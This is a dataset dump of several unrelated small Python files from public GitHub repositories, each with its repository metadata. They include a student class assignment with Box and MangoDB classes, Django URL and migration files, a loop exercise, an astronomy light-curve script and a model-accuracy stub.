a40b657ca26e2fccf8461234c2b7bec437955096 | 260ef543772b84896ff7dbf4a536f374e0a5c63b | /03_assignment_final.py | a42ae84b6b4cf98ecc86072b33d76537143b5dd2 | [] | no_license | crarnouts/Python-Work | 47cbebf98db0f2657bb5afd814a1853a2b81fe19 | e896f2cbb41f5a182798cccaa83d45efcf79f3f5 | refs/heads/master | 2020-06-25T03:41:47.802604 | 2019-07-27T16:34:53 | 2019-07-27T16:34:53 | 199,189,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,403 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 17 20:18:47 2019
@author: arnou
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 2 17:10:00 2019
@author: arnou
"""
'''
Assignment #3
1. Add / modify code ONLY between the marked areas (i.e. "Place code below"). Do not modify or add code elsewhere.
2. Run the associated test harness for a basic check on completeness. A successful run of the test cases does not guarantee accuracy or fulfillment of the requirements.
Please do not submit your work if test cases fail.
3. To run unit tests simply use the below command after filling in all of the code:
python 03_assignment.py
4. Unless explicitly stated, please do not import any additional libraries but feel free to use built-in Python packages
5. Submissions must be a Python file and not a notebook file (i.e *.ipynb)
6. Do not use global variables
7. Make sure your work is committed to your master branch in Github
8. Use the test cases to infer requirements wherever feasible
'''
import csv, json, math, pandas as pd, requests, unittest, uuid
# ------ Create your classes here \/ \/ \/ ------
# Box class declaration below here
class Box:
def __init__(self, length, width):
self.__width__ = width
self.__length__ = length
def render(self):
for i in range(self.__length__):
print ('*' * self.__width__)
def invert(self):
width_2 = self.__width__
length_2 = self.__length__
self.__width__ = length_2
self.__length__ = width_2
def get_area(self):
return self.__width__ * self.__length__
def get_perimeter(self):
return 2*self.__width__ + 2*self.__length__
def get_length(self):
return self.__length__
def get_width(self):
return self.__width__
def get_hypot(self):
return math.sqrt(self.__width__**2 + self.__length__**2)
def double(self):
self.__width__ = self.__width__*2
self.__length__ = self.__length__*2
return Box(self.__length__,self.__width__)
def __str__(self):
return str(self.__dict__)
def __eq__(self, other):
return self.__dict__ == other.__dict__
def print_dim(self):
return "length: "+ str(self.__length__),"width: "+ str(self.__width__)
def get_dim(self):
return self.__length__,self.__width__
def combine(self,other):
self.__width__ = self.__width__ + other.__width__
self.__length__ = self.__length__ + other.__length__
return Box(self.__length__,self.__width__)
# MangoDB class declaration below here
def merge_two_dicts(x, y):
z = x.copy() # start with x's keys and values
z.update(y) # modifies z with y's keys and values & returns None
return z
class MangoDB:
def __init__(self):
self.collections ={'default':{'version':1.0,'db':'mangodb','uuid':str(uuid.uuid4())}}
def display_all_collections(self):
for key in self.collections :
print ('collection: ',key)
for key2 in self.collections[key] :
print (key2,self.collections[key][key2])
def add_collection(self,collection_name):
self.collections[collection_name] = {}
def update_collection(self,collection_name,updates):
self.collections[collection_name] = merge_two_dicts(self.collections[collection_name], updates)
def remove_collections(self,collection_name):
del self.collections[collection_name]
def get_collection_names(self):
return list(self.collections.keys())
def list_collections(self):
print (list(self.collections.keys()))
def get_collection_size(self,collection_name):
return len(self.collections[collection_name])
def to_json(self,collection_name):
return json.dumps(self.collections[collection_name])
def wipe(self):
self.collections ={'default':{'version':1.0,'db':'mangodb','uuid':str(uuid.uuid4())}}
return self.collections
# ------ Create your classes here /\ /\ /\ ------
def exercise01():
'''
Create an immutable class Box that has private attributes length and width that takes values for length and width upon construction (instantiation via the constructor).
Make sure to use Python 3 semantics. Make sure the length and width attributes are private and accessible only via getters.
Immutable here means that any change to its internal state results in a new Box being returned.
Remember, here immutable means there are no setter methods. States can change with the methods required below i.e. combine(), invert().
In addition, create...
- A method called render() that prints out to the screen a box made with asterisks of length and width dimensions
- A method called invert() that switches length and width with each other
- Methods get_area() and get_perimeter() that return appropriate geometric calculations
- A method called double() that doubles the size of the box. Hint: Pay attention to return value here
- Implement __eq__ so that two boxes can be compared using ==. Two boxes are equal if their respective lengths and widths are identical.
- A method print_dim that prints to screen the length and width details of the box
- A method get_dim that returns a tuple containing the length and width of the box
- A method combine() that takes another box as an argument and increases the length and width by the dimensions of the box passed in
- A method get_hypot() that finds the length of the diagonal that cuts throught the middle
In the function exercise01():
- Instantiate 3 boxes of dimensions 5,10 , 3,4 and 5,10 and assign to variables box1, box2 and box3 respectively
- Print dimension info for each using print_dim()
- Evaluate if box1 == box2, and also evaluate if box1 == box3, print True or False to the screen accordingly
- Combine box3 into box1 (i.e. box1.combine())
- Double the size of box2
- Combine box2 into box1
- Using a for loop, iterate through and print the tuple received from calling box2's get_dim()
- Find the size of the diagonal of box2
'''
# ------ Place code below here \/ \/ \/ ------
box1 = Box(5,10)
box2 = Box(3,4)
box3 = Box(5,10)
box1.print_dim()
box2.print_dim()
box3.print_dim()
box1 == box2
box1 == box3
box1.combine(box3)
box2.double()
box1.combine(box2)
for i in range(0,len(box2.get_dim())):
print (box2.get_dim()[i])
box2.get_hypot()
return box1, box2, box3
# ------ Place code above here /\ /\ /\ ------
def exercise02():
'''
Create a class called MangoDB. The MangoDB class wraps a dictionary of dictionaries. At the the root level, each key/value will be called a collection, similar to the terminology used by MongoDB,
an inferior version of MangoDB ;)
A collection is a series of 2nd level key/value paries. The root value key is the name of the collection and the value is another dictionary containing arbitrary data for that collection.
For example:
{
'default': {
'version':1.0,
'db':'mangodb',
'uuid':'0fd7575d-d331-41b7-9598-33d6c9a1eae3'
},
{
'temperatures': {
1: 50,
2: 100,
3: 120
}
}
The above is a representation of a dictionary of dictionaries. Default and temperatures are dictionaries or collections.
The default collection has a series of key/value pairs that make up the collection.
The MangoDB class should create only the default collection, as shown, on instantiation including a randomly generated uuid using the uuid4() method and have the following methods:
- display_all_collections() which iterates through every collection and prints to screen each collection names and the collection's content underneath and may look something like:
collection: default
version 1.0
db mangodb
uuid 739bd6e8-c458-402d-9f2b-7012594cd741
collection: temperatures
1 50
2 100
- add_collection(collection_name) allows the caller to add a new collection by providing a name. The collection will be empty but will have a name.
- update_collection(collection_name,updates) allows the caller to insert new items into a collection i.e.
db = MangoDB()
db.add_collection('temperatures')
db.update_collection('temperatures',{1:50,2:100})
- remove_collection() allows caller to delete a specific collection by name and its associated data
- list_collections() displays a list of all the collections
- get_collection_size(collection_name) finds the number of key/value pairs in a given collection
- to_json(collection_name) that converts the collection to a JSON string
- wipe() that cleans out the db and resets it with just a default collection
- get_collection_names() that returns a list of collection names
Make sure to never expose the underlying data structures
For exercise02(), perform the following:
- Create an instance of MangoDB
- Add a collection called testscores
- Take the test_scores list and insert it into the testscores collection, providing a sequential key i.e 1,2,3...
- Display the size of the testscores collection
- Display a list of collections
- Display the db's UUID
- Wipe the database clean
- Display the db's UUID again, confirming it has changed
'''
test_scores = [99,89,88,75,66,92,75,94,88,87,88,68,52]
# ------ Place code below here \/ \/ \/ ------
db = MangoDB()
db.add_collection('testscores')
test_score_dict = { i : test_scores[i] for i in range(0, len(test_scores) ) }
db.update_collection('testscores',test_score_dict) #insert test scores into the collection
print(db.get_collection_size('testscores')) #returns the length
db.list_collections()
print(db.collections['default']['uuid']) #display the uuid of the database
db.wipe()
print(db.collections['default']['uuid']) #display the uuid of the database
# ------ Place code above here /\ /\ /\ ------
def exercise03():
'''
1. Avocado toast is expensive but enormously yummy. What's going on with avocado prices? Read about avocado prices (https://www.kaggle.com/neuromusic/avocado-prices/home)
2. Load the avocado.csv file included in this Githb repository and display every line to the screen
3. Open the file name under csv_file
4. The reader should be named reader
5. Use only the imported csv library to read and print out the avacodo file
'''
# ------ Place code below here \/ \/ \/ ------
import csv
with open('avocado.csv','r') as csv_file:
csv_reader = csv.reader(csv_file)
for line in csv_reader:
print(line)
# ------ Place code above here /\ /\ /\ ------
class TestAssignment3(unittest.TestCase):
def test_exercise01(self):
print('Testing exercise 1')
b1, b2, b3 = exercise01()
self.assertEqual(b1.get_length(),16)
self.assertEqual(b1.get_width(),28)
self.assertTrue(b1==Box(16,28))
self.assertEqual(b2.get_length(),6)
self.assertEqual(b2.get_width(),8)
self.assertEqual(b3.get_length(),5)
self.assertEqual(b2.get_hypot(),10)
self.assertEqual(b1.double().get_length(),32)
self.assertEqual(b1.double().get_width(),112)
self.assertTrue(6 in b2.get_dim())
self.assertTrue(8 in b2.get_dim())
self.assertTrue(b2.combine(Box(1,1))==Box(7,9))
def test_exercise02(self):
print('Testing exercise 2')
exercise02()
db = MangoDB()
self.assertEqual(db.get_collection_size('default'),3)
self.assertEqual(len(db.get_collection_names()),1)
self.assertTrue('default' in db.get_collection_names() )
db.add_collection('temperatures')
self.assertTrue('temperatures' in db.get_collection_names() )
self.assertEqual(len(db.get_collection_names()),2)
db.update_collection('temperatures',{1:50})
db.update_collection('temperatures',{2:100})
self.assertEqual(db.get_collection_size('temperatures'),2)
self.assertTrue(type(db.to_json('temperatures')) is str)
self.assertEqual(db.to_json('temperatures'),'{"1": 50, "2": 100}')
db.wipe()
self.assertEqual(db.get_collection_size('default'),3)
self.assertEqual(len(db.get_collection_names()),1)
def test_exercise03(self):
print('Exercise 3 not tested')
exercise03()
if __name__ == '__main__':
unittest.main() | [
"noreply@github.com"
] | crarnouts.noreply@github.com |
8bd8256fe811d3a65f35687124d1067ba57c6994 | bf67925b10ed518bf54d8261dd91b382d6aea68a | /groups/urls.py | 099f3b9341c9878d1fffda1f29dc50e0e606cbcf | [] | no_license | AmiiiGen/Social-Media-Site | 421a8f8fdb7202823935ccf86370d77b93242553 | 46aab91b8335e599e357eef5ac6573d911e16eb4 | refs/heads/master | 2023-04-25T03:59:10.579064 | 2021-05-14T09:30:44 | 2021-05-14T09:34:07 | 366,080,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py | from django.urls import path
from . import views
app_name = 'groups'
urlpatterns = [
path('', views.ListGroups.as_view(), name='all'),
path('new/', views.CreateGroup.as_view(), name='create'),
path('posts/in/<slug:slug>/', views.SingleGroup.as_view(), name='single'),
# url(r'posts/in/(/?P<slug>[\w-]+)', views.SingleGroup.as_view(), name='single'),
path('join/<slug:slug>/', views.JoinGroup.as_view(), name='join'),
path('leave/<slug:slug>/', views.LeaveGroup.as_view(), name='leave'),
]
| [
"amin.sheikhi93@gmail.com"
] | amin.sheikhi93@gmail.com |
3ab9db8026970ae5a27e3ccda794e6daf37b292b | bc23abef788b3f40950565baea8a8afe6ac7ed5a | /Unit4CLab/Unit4CLab.py | 98ae18389aab85b2d339a309e03cd480c9ac3eca | [] | no_license | 19doughertyjoseph/josephdougherty-python | 502c2c46676545b4db217fc71896c4da526d11b1 | 097584b582d013c5c5899efbf058c3aeb7d40b8d | refs/heads/master | 2020-03-28T02:14:13.263200 | 2019-01-17T17:17:25 | 2019-01-17T17:17:25 | 147,557,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | def main():
draw7()
starsAndStripes()
incTriangle()
def draw7():
for i in range(0, 7):
string = ""
for i in range(0, 7):
string += "*"
print (string)
def starsAndStripes():
for i in range(0, 3):
starString = ""
dashString = ""
for i in range (0, 7):
starString += "*"
dashString += "-"
print(starString)
print(dashString)
def incTriangle():
for i in range(1, 8):
for j in range(0, i):
print (i, end = "")
print()
main()
| [
"19hymangabrielle@bprep.org"
] | 19hymangabrielle@bprep.org |
ad5d1b7bda9bd683170c32f6da305b9a691513ef | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py | bdc07f94a156888a89f067ad64026758d3d61ea9 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
6cbe9bca7c27a931f4643048634e863bfdd5c383 | b1289970ac93a2f5c36779049e372b3d18a99573 | /src/main/python/model_accuracy.py | 076aac57ebd54873c20f3d82a89018e85ce7bcfb | [] | no_license | NajibMAHJOUBI/world_cup_2018 | b0beddc19ec8c2798eee6baaaa11cb2a0040cb8f | cf8f733ddf59cf3c4776ab30b64e5e0caa7faa89 | refs/heads/master | 2021-01-25T11:33:23.886656 | 2018-06-27T12:48:15 | 2018-06-27T12:48:15 | 123,406,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 603 | py | import os
from model_definition import DefinitionModel
class AccuracyModel(DefinitionModel):
def __init__(self, year, model, model_type_, path_prediction):
DefinitionModel.__init__(self, year, None, "classification", None, None)
self.model_type_ = model_type_
self.path_prediction = path_prediction
def __str__(self):
pass
def get_path_prediction(self, stage):
return os.path.join(self.path_prediction, self.model_type_, self.get_year(), stage, model+'.csv')
def append_stages(self):
pass
def save_accuracy(self):
pass
| [
"najib.mahjoubi@gmail.com"
] | najib.mahjoubi@gmail.com |
479c0c2c3846e0dbd095118519a381fdb9848cfc | d3f0698c9df956c7028432102e88e282232aa9ca | /bookshelf/migrations/0014_auto_20200504_1749.py | 55d20375293db9639f71864c30de7c2175804a5f | [] | no_license | aaaaasv/library | 224582cd63246020ee4ce28feffa53070c71356b | 08b79803a8cd91e1187ee6dac0131e644d5b2b1a | refs/heads/master | 2023-03-27T01:29:00.251923 | 2021-04-01T14:30:00 | 2021-04-01T14:30:00 | 255,107,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.0.3 on 2020-05-04 14:49
from django.conf import settings
from django.db import migrations
import sortedm2m.fields
from sortedm2m.operations import AlterSortedManyToManyField
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('bookshelf', '0013_auto_20200502_1159'),
]
operations = [
AlterSortedManyToManyField(
model_name='paperbook',
name='reserver',
field=sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, related_name='reserverOfBook', to=settings.AUTH_USER_MODEL),
),
]
| [
"aaaaasv@users.noreply.github.com"
] | aaaaasv@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.